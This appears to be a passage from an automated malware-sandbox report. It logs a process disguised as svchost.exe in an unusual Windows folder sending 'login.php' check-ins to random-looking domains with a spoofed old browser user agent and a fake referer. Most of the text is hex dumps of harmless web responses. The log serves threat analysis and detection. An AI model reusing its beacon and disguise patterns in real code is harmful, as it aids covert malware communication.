                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="34.7",amp_style_sanitizer;dur="16.4",amp_tag_and_attribute_sanitizer;dur="13.0",amp_optimizer;dur="16.1"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y54P%2FbC6Czn91DdFrBkD9dlpnnSwTVe%2BQ%2BXI46GnlYb15puEDyVJ3Qyf7eFI%2F8sod16RbKHjaD5vzEvblvLpPiKkG4V762%2FB%2FaqdNQgm4PFjAb0M4J%2FO5%2BPIvEOTEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1599a3be014-NRT
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=155407&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18636&cwnd=32&unsent_bytes=0&cid=5a634b9774fd58d2&ts=1343&x=0"
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC272INData Raw: 37 63 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c14<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68
                                                                                                                                                                                                            Data Ascii: eta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{h
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67
                                                                                                                                                                                                            Data Ascii: w-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lig
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72
                                                                                                                                                                                                            Data Ascii: ;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:fir
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c
                                                                                                                                                                                                            Data Ascii: (.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-bl
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75
                                                                                                                                                                                                            Data Ascii: r{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolu
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28
                                                                                                                                                                                                            Data Ascii: otbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1369INData Raw: 6e 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                            Data Ascii: nt;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.956942188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:07:46 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:07:47 UTC1092INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="48.4",amp_style_sanitizer;dur="20.0",amp_tag_and_attribute_sanitizer;dur="22.4",amp_optimizer;dur="24.5"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dIJnh%2FNAB49Q0h87DSz8i8v4u3vZRoD2hBl66julo9bS2MbsgPloCPrIv2sY%2B%2BT%2FPPI3KKkoTrLOC7iy6vbyhb6vQaWzY2Qq%2B4gtUGnvd7DN3oaqn3BkVw5XZsT1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1667ea542c1-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2439764&cwnd=251&unsent_bytes=0&cid=b3c5f4b20f6ea0cb&ts=1454&x=0"
                                                                                                                                                                                                            2024-11-11 17:07:47 UTC277INData Raw: 37 63 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c1a<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-11-11 17:07:47 UTC1369INData Raw: 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74
                                                                                                                                                                                                            Data Ascii: harset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height
                                                                                                                                                                                                            2024-11-11 17:07:47 UTC1369INData Raw: 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78
                                                                                                                                                                                                            Data Ascii: olling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.95496499.83.170.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:01 GMT
                                                                                                                                                                                                            Etag: "cqr8k3giq619wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                            Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                            Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                            Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                            Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
